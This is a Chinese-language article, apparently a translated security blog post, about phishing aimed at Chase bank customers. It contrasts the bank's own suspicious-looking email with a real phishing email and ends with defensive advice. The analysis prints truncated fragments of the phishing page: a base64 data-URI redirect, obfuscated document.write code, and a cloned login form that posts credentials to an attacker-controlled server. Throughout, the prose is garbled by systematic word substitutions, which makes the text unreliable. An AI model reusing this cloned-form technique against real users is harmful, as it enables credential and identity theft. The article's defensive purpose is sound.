换个视点看看,为什么垂钓进犯总能成功
当我榜首次收到银行发来的“安全”邮件时,我榜首反响便是这儿是否有诈?由于在我看来,它实在是太像垂钓邮件了。这封躺在收件箱里的邮件来历于我银行司理的个人邮箱地址,而非Chase银行的官方邮箱。邮件中不只顺便有一个HTML页面,而且还有文字告知我“在浏览器中翻开这个页面以了解怎么进行下一步操作”,这一切瞬间让我进步了警觉。
首要,自身电子邮件这个东西便是不安全的,更何况是我的银行还发送了一封带有附件的“安全”邮件给我。这看起来就像是一次教科书般的垂钓进犯,所以我赶忙拿起电话直接打给了我的银行司理。
“不是的,这是合法邮件。我需求你将它打印出来,然后签署一些文件。”这便是银行司理给我的答复。
但我提到:“首要,邮件发送人的地址看起来就十分可疑,而且这种邮件不只要让我点击外部链接并翻开附件,而且还要我在Web表单中填写我的个人信息,这谁会信啊?”
银行司理提到:“我彻底了解,这确实会让人置疑。但这封邮件没有任何问题,我确实发过这封邮件给你,假如需求的话我还可以再发一次。”
所以乎,他公然又发了一封给我。这封重发的邮件看起来与之前那封彻底相同,但这一次我正在与我的银行司理通话,所以我依照要求翻开了附件。邮件中有一个“点击读取信息”的按钮,点击之后将我重定向到了Chase银行的安全邮件门户网站。可是整个进程让我感到十分的奇葩,我也将我忧虑的当地告知了我的银行司理、他的上司、以及Chase的客户支撑部分。
值得一提的是,咱们是不可能完彻底全地对客户的行为进行安全培训的,而银行所选用的交互办法与垂钓进犯几乎没有差异,这就十分风险了。
进犯剖析
近期,我收到了一封实在的垂钓邮件。这封邮件来自chase.online@chasee.com,它很明显是封假造的邮件,但假如不细心的话仍是看不出什么端倪的。这封邮件宣称我的银行账号近期呈现了许多错误操作,而且跟之前那封实在的邮件相同,它也让我在浏览器中翻开附件HTML文件并按提示进行操作。
但很明显我不会按它说的做!所以,我把HTML文件下载了下来,然后把它拖到了代码检查窗口中。我发现,除了正常的HTML代码之外,文件中还包括一段脚本代码:
window.location="data:text/html;base64,PCFET0NUWVBFIEhUTUwg...
这个页面会在地址栏中显现一大堆Base64编码的数据,代码自身包括有Chase银行官网的脚本、图片以及指向合法页面的链接,整个页面看起来和正常的Chase银行登录页面没什么差异。可是,代码中还包括有其他的脚本代码(经过混杂),这些代码会在登录页面中增加一个自定义的表单:
document.write(unescape('%3C%66%6F%72...
在对代码进行了反混杂之后,我发现一切的代码都与Chase银行的实在登录页面共同,只不过表单action特点指向的是进犯者所操控的服务器。
"http://191..."class="button" method="post" name="submit"id="submit">
假如不知情的用户真的在浏览器中翻开了这个页面,那么他们将会看到一个带有Chase商标的页面让他们承认以下信息:
1. 账号登录信息
2. 联络信息
3. 银行卡信息
4. 社保号和驾驶证信息等等
上述一切的这些信息都不会提交给Chase,而是提交给了进犯者自己的服务器。这台由进犯者操控的服务器在成功获取到了这些数据之后,会将用户重定向到Chase的在线登录页面,所以这会让用户彻底无法察觉到反常。我以为,之所以用户会这样做,彻底是由于Chase平常对用户的“练习”所导致的(经过邮件附件要求用户供给身份验证信息)。
怎么维护自己
除非Chase银行不再经过这种带有附件HTML的邮件来要求用户登录并填写自己的信息,不然广阔Chase银行的客户仍是免不了遭受垂钓进犯。可是,咱们依然有许多办法可以防止自己落入这种网络垂钓圈套之中。
首要,千万不要直接翻开邮件中的附件网页,除非你可以百分之百确认这封邮件没有任何问题。其次,永久不要容易在任何网页中填写自己的个人信息。第三,假如邮件要求你供给个人信息,而你也不得不这样做的话,请直接拜访在线服务的官方网站去填写,千万不要图便利直接点击邮件中的地址。这些办法相同适用于电话垂钓。永久不要容易在电话中给出自己的个人信息,除非那个电话是你打过去的。
最终,请你不要嫌费事,必定要将一切不正常的状况上报给自己的服务商。当你遇到了勒索邮件或有人测验经过电话来盗取你的信息时,请必定要即便陈述。
总结
实际上,假如想要维护用户不受网路垂钓进犯的损害,只是依托进步用户安全意识仍是远远不够的,这个进程中厂商也要负起必定的职责。所谓心中无鬼,全国无鬼。许多厂商知道这封邮件是他们自己发的,就不会太介意去证明邮件的安全性与合法性,但关于用户来说,当他们习惯了这样的交互办法时,也就给了垂钓进犯者待机而动。
